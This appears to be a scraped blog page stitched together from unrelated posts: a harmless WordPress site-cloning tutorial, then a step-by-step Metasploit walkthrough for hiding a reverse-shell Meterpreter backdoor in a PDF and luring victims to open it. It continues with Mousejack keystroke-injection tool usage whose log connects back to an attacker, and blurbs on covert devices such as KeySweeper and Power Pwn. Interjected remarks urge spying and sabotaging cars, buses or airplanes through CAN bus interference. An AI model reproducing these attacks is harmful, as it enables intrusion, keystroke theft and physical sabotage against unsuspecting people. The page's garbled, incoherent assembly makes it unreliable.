Tuesday, October 24, 2017

How to clone website for testing: the easiest way for free

In this easy and detailed step-by-step tutorial you will learn:
  • How to create a subdomain, install WordPreIss there and copy your website to this subdomain using WP Clone plugin.
  • How to remove the subdomain and clean everything up after your experiments.
  • Some notes about restrictions of this free method of creating a copy of your website and alternative (more convenient and professional) ways to clone your site for testing using staging environment.
Another implementation of cloning websites may be simply duplicating sites. For example, I create copies of a WordPress site within a couple of minutes to use them on different hosts to monitor their performance for my Hosting Performance Contest project.
 
You are welcome to use the table of contents below for easy navigation within this tutorial:

Restrictions To Clone Website

Although WP Clone is very easy tool to clone website, you may need to know about some restrictions. There are good chances you don’t need to bother about them, but anyway there you go:
  • Cloning your website using WP Clone may take an hour or more if you website is more than 2 GB in size. But I find this plugin working well only for small sites (under a couple of hundred megabytes). There’s another plugin All In One WP Migration which has a similar functionality, but it works more stable (the plugin is free for websites upto 500 MB).
  • Also, if you use caching, security or redirecting plugins, you may have to re-install them on your test site.
  • Note that WP Clone does not make the 100% exact clone of your website. For example, it does not clone your custom folders or files (including .htaccess) in your WordPress installation folder (e.g. in public_html). However, if you are not going to migrate your website, and you just want to use WP Clone to create your site copy for further testing, then it’s likely you don’t need to bother about that (especially if you are not aware of custom files or folders). Or you can to copy your files and folders manually.
  • As noted at the plugin description, you should not use this plugin on WP Engine and some other hosts which use proprietary file system. It’s very likely that you are ok to use WP Clone with any shared hosting though.
Although you may be a bit hesitating now because you are not sure about all these restrictions, but don’t worry. In most cases you can go fine with WP Clone.

Best Alternatives To This Free Method Of Creating A Copy Of Your Website For Testing

In this post I describe the simplest way how to get a copy of your website for free. The core of this method is using WP Clone by WP Academy plugin. There are other great plugins such as Duplicator or All-in-One WP Migration which allow you to clone website, but WP Clone is the quickest and the easiest way to do it for smaller sites (under 2 GB or so).
However, in my own experience I find WP Clone plugin working well only for small sites (under a couple of hundred megabytes). Although the plugin works the fastest compared to its alternatives.
Another plugin, All In One WP Migration, has a similar functionality. And it’s also very easy to use (see my tutorial here). I love this plugin for being more stable. The plugin is free for websites upto 500 MB. I consider this plugin as the best alternative to WP Clone.
As regards Duplicator plugin, it’s not as easy to use. But it’s more fundamental compared to WP Clone. Although Duplicator can’t handle big sites too (usually due to shared hosting resources restriction). Even its paid version has a limit of handling websites 2 GB maximum.
Anyway, it may be not convenient each time to make a copy of your website like that using a plugin. Moreover, using cloning plugins can’t manage to push live your changes to your original site. It’s supposed that you just repeat the changes on your original site when you make sure they work on your test site.
Ideally, you just need to be able to clone your website and also push your changes from your test site to your original site with simply one click. But this is not possible without special staging (or testing) environment on you hosting.
So, if you are a website developer or just need to experiment often, you may want to use a specific functionality on a hosting level, because it’s much more convenient and more reliable to use. As I’ve noted it’s called staging environment and it’s available at some hosting providers such as SiteGround (very affordable prices), WP Engine and GetFlyWheel. By the way, these hosts offer Git integration as well. All these hosts are very good and recommended.
Just for an educational record: To be technically precise, staging and testing environments are different things, but for our needs it makes no sense in differentiating them. Thus, to simplify I mean the same thing under both ‘testing environment’ and ‘staging environment’ in this post. And if you are puzzled by these technical words, just ignore it without any hesitation and go on with the tutorial 🙂
Congratulations! The theoretical and the most difficult part of this blog post is already behind 
Let’s rock with easy practice!

Video Tutorial How To Create A Copy Of Your Website For Testing For Free

On this video I show you step by step how to create a copy of your website using WP Clone. The video starts from creating a subdomain where your clone website will reside. And the video finishes with deleting the subdomain and cleaning everything up.
In the tutorial below I explain basically the same, but I add some notes.

Step 1: Backup Your Website Before Making Any Changes

It’s a good piece of advice whenever you are going to do some changes on your website.
You may want to back up your whole hosting account creating a full cPanel backup (if you are on a shared hosting, such backup can be restored by your host). Also you can create partial cPanel backups of your files and databases separately (you will be able to restore them by yourself if you need it). I have tutorials about cPanel backups here.
By the way, I use a hassle-free, very reliable and super convenient backup solution CodeGuard(you may find my comparison review here).
So, I consider that you have your backups and you are safe. Now let’s move on.

Step 2: Set Up Your New Test Site On A Subdomain

This chapter contains two parts: creating a subdomain in cPanel and installing a default WordPress site on this subdomain.

2.1. Create the subdomain

Log in to your cPanel and click Subdomains:
website clone - creating subdomain
Specify the name for a new subdomain and create the subdomain:
clone website - creating subdomain
You have created subdomain for your clone website!

2.2. Install WordPress on the subdomain you created

Now go back to your cPanel, locate WordPress installer (or Softaculous and then WordPress installer in it) and click it:
clone website - wordpress installer
When installing WordPress make sure you select the subdomain:
clone website - wp installing on subdomain
Be careful and do NOT select your website domain without the subdomain. Select the subdomain. Otherwise you will destroy your original website.
The other part of installing WordPress is nothing special. Watch the video tutorial I put in the beginning of this post if you want to see how I installed WordPress on my subdomain.

Step 3: Create Backup To Clone Website

This chapter contains two parts. The first part is about installing WP Clone plugin on your original WordPress website which you want to clone. And in the second part I will show you how you can create backup with WP Clone. It’s very easy.

3.1. Install WP Clone plugin on your original website

Nothing special in this part. Just login to your original website Dashboard and install WP Clone by WP Academy plugin the usual way. I.e. go to Dashboard / Plugins / Add new /, search for WP Clone plugin and install it.
clone website - locate wp clone
Then activate the plugin. That’s it.

3.2. Create a backup of your original site with WP Clone

It’s a very sweet part, because it’s just one-click action 🙂
clone website - create backup with wp clone
Yes, it’s that simple.
WP Clone plugin is ready to be used out of the box, right away after installation. But it also has some advanced settings for specific or advanced needs. These settings can be used for excluding folders, including non-WordPress database tables, memory settings for performance optimization etc.
However, if your website is not big (say, under 1-2 GB), then all you’ll need to do in most cases is just to click one button with all the settings set by default.
If your site is bigger, then in order to reduce the time of cloning, you may want to exclude some heavy folders, e.g. /wp-content/uploads/ where your images are stored.
Also, you don’t want to clone folders with backups. So, if you use a backup plugin that stores the backups within your WordPress installation folder (which is not a good practice by the way, then exclude this folder too.
Here’s where in WP Clone advanced settings you can exclude folders and big files (e.g. media files) from your being restored on your clone website:
clone website - exclude folders in wp clone
 
When you create backup with WP Clone, you get the link where the backup has been put. Copy this link address – you’ll need it on the next step when you restore the backup on your test site:
clone website - copy link address with backup

Step 4: Clone Your Website – Deploy Your Test Site

This chapter contains two parts. The first part is about installing WP Clone plugin on your test website. And in the second part I’ll show you how to restore the backup created with WP Cloneon your test website to perform the cloning.

4.1. Install WP Clone on your test site

Installing WP Clone plugins is the same simple operation as I described above.
Install this plugin on your test site which is on the subdomain you created.

4.2. Restore WP Clone backup on your test site

This is the sweetest part. Because you can do this the heaviest job very easily by pressing literally one button.
You just need to open WP Clone section on your test site, select option “Restore from URL”, specify URL with your WP Clone backup (the link you copied on this step when you created the WP Clone backup), select “I agree” box to confirm restoration and click “Restore” button.
clone website - restore wp clone backup
Now your clone website is almost ready. The only thing is left is to make some checking. Read the next short chapter for that.

Step 5: Check That Your Test Site Works And Hide It From Search Engines

You need to do basically two things in your test website:
  1. Hide your test site from search engines to avoid possible duplicate content issues (can be bad for SEO). You can do it in Dashboard / Settings / Reading :
  2. clone website - stop search engines
  3. Re-save your permalinks (Dashboard / Settings / Permalinks)
  4. And just open your test site, see if it’s the same as your original site and click some links (e.g. open a blog post) to check that links on your test site work.
You may also want to re-install your caching and security plugins (as well as redirecting plugins) if you use and if you need them on your test site.
That’s it with setting up the clone website!
That wasn’t difficult, was it?
Now you can experiment on it as much as you want.

Step 6-7: Experiment On Your Test Site And Then Make Changes On Your Original Site

There’s no tutorial for this part, because it’s totally up to you.
For example, you can install new themes or plugins to see if they work for you well. Or you may completely change the design of your clone website. Or do anything with it.
So, you make any changes on your test website, see if they are good and apply these changes on your original site too.
Unfortunately there’s no ‘push’ functionality when you could move your changes from your test website to your original site easily without repeating these changes on your original site. For this purpose you need hosting with staging environment. Check out these hosts that I recommend that offer staging environment for convenient testing and development: SiteGround (it has very affordable prices), WP Engine (one of the acknowledged great WordPress managed hosting) and GetFlyWheel (more affordable WP managed host).

Step 8: Remove Your Test Site And Clean Up

When you are done with testing, you may want to delete your test site (to free up space on your hosting or to create a new clone website instead of this one).
To remove completely your test website that you have created following this tutorial, you need to do these steps:
  1. Remove installation of WordPress on your test site.
  2. Remove folder for your subdomain
  3. Remove the subdomain
Steps 2 and 3 can be done in any order.

8.1. Unsintall WordPress on you test site

In order to delete WordPress installation on your clone website (on the subdomain you created), you need to go to your cPanel / Softaculous / current installation for WordPress and remove your test site installation:
clone website - softaculous
clone website - softaculous wordpress
clone website - softaculous remove wordpress
Be careful when uninstalling – select the subdomain where your clone website reside, not the root domain with your original website 🙂
clone website  - remove wordpress in softaculous
clone website  - remove wordpress in softaculous 2

8.2. Remove folder for your test subdomain

Go to cPanel / File manager / public_html / , locate the folder associated with the subdomain you created for your test site and delete it. This folder will be already empty after you uninstalled WordPress on the previous step.
clone website - delete subdomain folder

8.2. Remove your test subdomain

Go to your cPanel and click Subdomains:
website clone - creating subdomain
And then remove your test subdomain:
remove clone website subdomain
That’s it! You have removed the clone website completely.

How to Embed a Backdoor Connection in an Innocent-Looking PDF


Let's start by firing up Metasploit. If you haven't updated your Metasploit yet, this would be a good time to do it. Simply type msfupdate at the msf prompt.

Step 1Find the Appropriate Exploit

First, let's find the appropriate exploit by searching Metasploit for one that will use this version of Adobe Reader:
msf > search type:exploit platform:windows adobe pdf
In the screenshot above we can see that Metasploit listed all the exploits that met our criteria. Let's use the "exploit/windows/fileformat/adobe_pdf_embedded_exe".
msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe

Step 2Gather Info on This Exploit

Now let's take a look at the information available to us about this exploit:
msf > exploit (adobe_pdf_embedded_exe) > info
Note that in the description, Metasploit tells us that it embeds a Metasploit payload into an existing PDF file. The resulting PDF can be sent to a target as part of a social engineering attack. In addition to sending to the victim, one can also embed it into a website inviting the unsuspecting victim to download it.

Step 3Set Our Payload

In our next step, we need to set our payload to embed into the PDF. Type:
msf > exploit (adobe_pdf_embedded_exe) > set payload windows/meterpreter/reverse_tcp

Step 4Set Options

Now that we chosen our exploit and set our payload, the only thing left to do is to set our options. Let's take a look at the options for this exploit and payload by typing:
msf > exploit (adobe_pdf_embedded_exe) > show options
As you can see from the screenshot above, Metasploit requires us to provide an existing PDF where it can embed the Meterpreter.
Let's set a file named chapter1.pdf, presumably some class notes (make certain that this file was created with Reader 9 or earlier), to our INFILENAME option.
msf > exploit (adobe_pdf_embedded_exe) > set INFILENAME chapter1.pdf
Then change the default FILENAME of the output file with the embedded Meterpreter to same innocuous sounding chapter1.pdf. The default name is evil.pdf, but is likely to set off too many alarms.
msf > exploit (adobe_pdf_embedded_exe) > set FILENAME chapter1.pdf
Then, set the LHOST (our system) to our IP address or 192.168.100.1.
msf > exploit (adobe_pdf_embedded_exe) > set LHOST 192.168.100.1

Step 5Double Check the Settings

Now, let's check our options again to see whether everything is ready to go.
msf > exploit (adobe_pdf_embedded_exe) > show options

Step 6Exploit!

As you can see from the screenshot above, all our options are set all we need to do now exploit.
msf > exploit (adobe_pdf_embedded_exe) > exploit
Metasploit has created a PDF named chapter1.pdf that contains the Meterpeter listener. Metasploit has placed this file at /root/.msf4/local/chapter1.pdf.
Simply copy this file to your website and invite visitors to download it. When our victim downloads and opens this file from your website, it will open a connection to your system that you can use to run and own their computer system.
Stay tuned, because in our next couple of blogs, we'll look at ways to avoid the victim's system antivirus software.

Run Both Ethernet and Phone Over Existing Cat-5 Cable ..."though I don't know why you would run multiple phone lines.."

so....microsoft denied me access to already built in machines...but keysweeper is basicly an ups power backup hack...

UPS Multiplug Hack



With all the power cuts recently thanks to Eskom and their “Load Shedding” I decided to re-use my old APC UPS to power something other than my computer and monitor. With the Multiplug plug hack I connected the conventional “Kettle” plug cable to an ordinary household 220v multiplug adapter. So far I was able to power my Telkom ADSL router, 8 port switch, PlayStation 3 and even a hair clipper.

!!!WARNING!!!
Modifying or using your UPS in any manner not specified by the manufacturer will void your warranty. Do not attempt to power heavy electronic devices this will most certainly DAMAGE your UPS. Please follow the necessary safety precautions when working with electricity. Attempt at your own risk DIYGadgets.co.za cannot be held liable for any loss or damage!

Devices Confirmed Working on Battery Backup:
  • ADSL Router
  • 4 Port Network Switch
  • Sony PlayStation 3
  • Hair Clippers

Devices Confirmed NOT WORKING on battery backup:
  • Hot Water Heater “Kettle” – (DO NOT even attempt this as it will send your UPS in OVERLOAD)

Here is the multiplug with UPS :


Here is a video of my UPS running on battery backup powering an ADSL Router & Switch

[embedyt]https://www.youtube.com/watch?v=cl7qRjAxgaI&width=500&height=400[/embedyt]

This video shows a PlayStation 3 running on battery backup

[embedyt]https://www.youtube.com/watch?v=wVdfddIfTEk&width=500&height=400[/embedyt]

This video shows a Hair Clipper running on battery backup

[embedyt]https://www.youtube.com/watch?v=4-kBqjnX3J4&width=500&height=400[/embedyt]

talking about Snowden just a resume ...Power Strip's a Penetration Testing Tool in Disguise

Power Pwn is a fully integrated enterprise-class device that can be used over Ethernet, wireless or Bluetooth connections.
It is priced at US$1,300 and is currently available for pre-order.
The Power Pwn "is similar to a 1.2 GHz ARM-based processor running Linux,

he Power Pwn has fully functional 120/240v AC sockets. It comes with 16 GB of internal disk storage and onboard dual-Ethernet ports. It can be used with high-gain 802.11b/g/n wireless services or with high-gain Bluetooth, the latter at a range of up to 1,000 feet.
It also has a fully automated NAC/802.1x RADIUS bypass; out-of-band SSH access over 3G and GSM cell networks; and an unlocked external 3G/ GSM adapter. The 3G/GSM adapter is compatible with SIM cards from AT&T, Vodafone, Orange and GSM carriers in more than 160 countries.
Users can text in Bash commands through SMS.
The Power Pwn maintains persistent, covert, encryptedSSN access to target networks.
It tunnels through application-aware firewalls and intrusion-prevention systems. It supports HTTP proxies and SSH-VPN. It is said to be unpingable, and it has no listening ports in stealth mode.
The Power Pwn comes preloaded with Debian 6, Metasploit, SET, Fast-Track, Aircrack and other tools.
"The tools on it are all open source, well known tools," Pwnie Express' Hughes said.
The Power Pwn has a graphical user interface (GUI) that's used to configure it to a qualified domain name or a public IP address on a receiver station, either over Ethernet or wireless or 3G. It can be managed over the UI or through a command line, Hughes said.

A Double-Edged Sword

Once the Power Pwn is deployed, if it engages network access control and runs in stealth mode, it is essentially undetectable

Monday, October 23, 2017

You want to hack the general you can not stand donkeys ....you're just next door...Mousejack Transmit – Wireless Mouse/Keyboard Attack With Replay/Transmit PoC


This is code extending the mousejack tools http://ift.tt/1PX8IIT.
Replay/transmit tools have been added to the original tools.
POC packets based on a Logitech Wireless Combo MK220 which consists of a K220 wireless keyboard and an M150 wireless mouse are included in the logs folder.
More details available here http://ift.tt/2p83Mcg
Pseudo-promiscuous mode device discovery tool, which sweeps a list of channels and prints out decoded Enhanced Shockburst packets.
usage: ./nrf24-scanner.py [-h] [-c N [N …]] [-v] [-l] [-p PREFIX] [-d DWELL]optional arguments: -h, –help show this help message and exit -c N [N …], –channels N [N …] RF channels -v, –verbose Enable verbose output -l, –lna Enable the LNA (for CrazyRadio PA dongles) -p PREFIX, –prefix PREFIX Promiscuous mode address prefix -d DWELL, –dwell DWELL Dwell time per channel, in milliseconds
Scan for devices on channels 1-5
./nrf24-scanner.py -c {1..5}
Scan for devices with an address starting in 0xA9 on all channels
./nrf24-scanner.py -p A9
sniffer
Device following sniffer, which follows a specific nRF24 device as it hops, and prints out decoded Enhanced Shockburst packets from the device. This version has also been modified to log the packets to a log file
usage: ./nrf24-sniffer.py [-h] [-c N [N …]] [-v] [-l] -a ADDRESS -o OUTPUT [-t TIMEOUT] [-k ACK_TIMEOUT] [-r RETRIES] optional arguments: -h, –help show this help message and exit -c N [N …], –channels N [N …] RF channels -v, –verbose Enable verbose output -l, –lna Enable the LNA (for CrazyRadio PA dongles) -a ADDRESS, –address ADDRESS Address to sniff, following as it changes channels -o OUTPUT, –output OUTPUT Output file to log the packets -t TIMEOUT, –timeout TIMEOUT Channel timeout, in milliseconds -k ACK_TIMEOUT, –ack_timeout ACK_TIMEOUT ACK timeout in microseconds, accepts [250,4000], step 250 -r RETRIES, –retries RETRIES Auto retry limit, accepts [0,15]
Sniff packets from address 8C:D3:0F:3E:B4 on all channels and save them to output.log
./nrf24-sniffer.py -a 8C:D3:0F:3E:B4 -o logs/output.log
replay/transmit
Replay captured packets or transmit generated ones. It follows a specific nRF24 device as it hops, and sends packets from a log file.
usage: ./nrf24-replay.py [-h] [-c N [N …]] [-v] [-l] -a ADDRESS -i INPUT_FILE [-t TIMEOUT] [-k ACK_TIMEOUT] [-r RETRIES] optional arguments: -h, –help show this help message and exit -c N [N …], –channels N [N …] RF channels -v, –verbose Enable verbose output -l, –lna Enable the LNA (for CrazyRadio PA dongles) -a ADDRESS, –address ADDRESS Address to sniff, following as it changes channels -o INPUT_FILE, –input INPUT_FILE Input file that has the packets to sned -t TIMEOUT, –timeout TIMEOUT Channel timeout, in milliseconds -k ACK_TIMEOUT, –ack_timeout ACK_TIMEOUT ACK timeout in microseconds, accepts [250,4000], step 250 -r RETRIES, –retries RETRIES Auto retry limit, accepts [0,15]
Send packets from file keystroke.log to address 8C:D3:0F:3E:B4 on hopping channel
./nrf24-replay.py -a 8C:D3:0F:3E:B4 -i logs/keystroke.log
network mapper
Star network mapper, which attempts to discover the active addresses in a star network by changing the last byte in the given address, and pinging each of 256 possible addresses on each channel in the channel list.
usage: ./nrf24-network-mapper.py [-h] [-c N [N …]] [-v] [-l] -a ADDRESS [-p PASSES] [-k ACK_TIMEOUT] [-r RETRIES]optional arguments: -h, –help show this help message and exit -c N [N …], –channels N [N …] RF channels -v, –verbose Enable verbose output -l, –lna Enable the LNA (for CrazyRadio PA dongles) -a ADDRESS, –address ADDRESS Known address -p PASSES, –passes PASSES Number of passes (default 2) -k ACK_TIMEOUT, –ack_timeout ACK_TIMEOUT ACK timeout in microseconds, accepts [250,4000], step 250 -r RETRIES, –retries RETRIES Auto retry limit, accepts [0,15]
Map the star network that address 61:49:66:82:03 belongs to
./nrf24-network-mapper.py -a 61:49:66:82:03
continuous tone test
The nRF24LU1+ chips include a test mechanism to transmit a continuous tone, the frequency of which can be verified if you have access to an SDR. There is the potential for frequency offsets between devices to cause unexpected behavior. For instance, one of the SparkFun breakout boards that was tested had a frequency offset of ~300kHz, which caused it to receive packets on two adjacent channels.
This script will cause the transceiver to transmit a tone on the first channel that is passed in.
usage: ./nrf24-continuous-tone-test.py [-h] [-c N [N …]] [-v] [-l]optional arguments: -h, –help show this help message and exit -c N [N …], –channels N [N …] RF channels -v, –verbose Enable verbose output -l, –lna Enable the LNA (for CrazyRadio PA dongles)
Transmit a continuous tone at 2405MHz
./nrf24-continuous-tone-test.py -c 5
Packet generator script
This uses a dictionary to map keyboard presses to the equivalent packets. It reads stdin input and logs the mapped packets to logs/keystrokes.log. It will accept input until Ctrl+C is pressed.
usage: ./keymapper.py
Log files
The folder logs contains various pre-saved packets for various keyboard operations.Shell.log is for exploitation of a Windows machine by running a powershell one-liner which connects back to the attacker machine.
The file keys.log serves as a reference where various key presses and combinations are mapped to their equivalent packets.Demo
A demo of exploiting a Windows machine:
Download Mousejack Transmit http://ift.tt/2o5wtVx http://ift.tt/2aM8QhC

You want play Snowden, or spy on a russian, or spy on a japonese high tek company, you plug this into the electrical current, over the next wall, or on the down floor. KeySweeper is a stealthy Arduino-based device, camouflaged as a functioning USB wall charger, that wirelessly and passively sniffs, decrypts, logs and reports back (over GSM) all keystrokes from any Microsoft wireless keyboard in the vicinity.







you want to track maritime police, you dive and plug in on the radio Transmitters, Single-channel high power VHF TX

You want to blow up a car, or a bus, or an airplane; you will use sabotage. and interfer with the motor, the speed, the battery power, and the performance.

CAN BUS HACK 

CAN / CANopen / J1939 / NMEA2000 / DeviceNet - Analyzer

Very simple tool for users who need to interface with a device based on CAN (CAN/CANopen/J1939/NMEA2000/DeviceNet) such as motors, sensors and many other devices. 

http://www.adfweb.com/Home/products/CAN_BUS_analyzers.asp?frompg=GooHardware&loc_phy=1011747&k001=p&c1-k1=can%20bus%20sniffer&d=c&gclid=EAIaIQobChMIpJzI8KmG1wIVcjPTCh1HqwR4EAAYASAAEgIobvD_BwE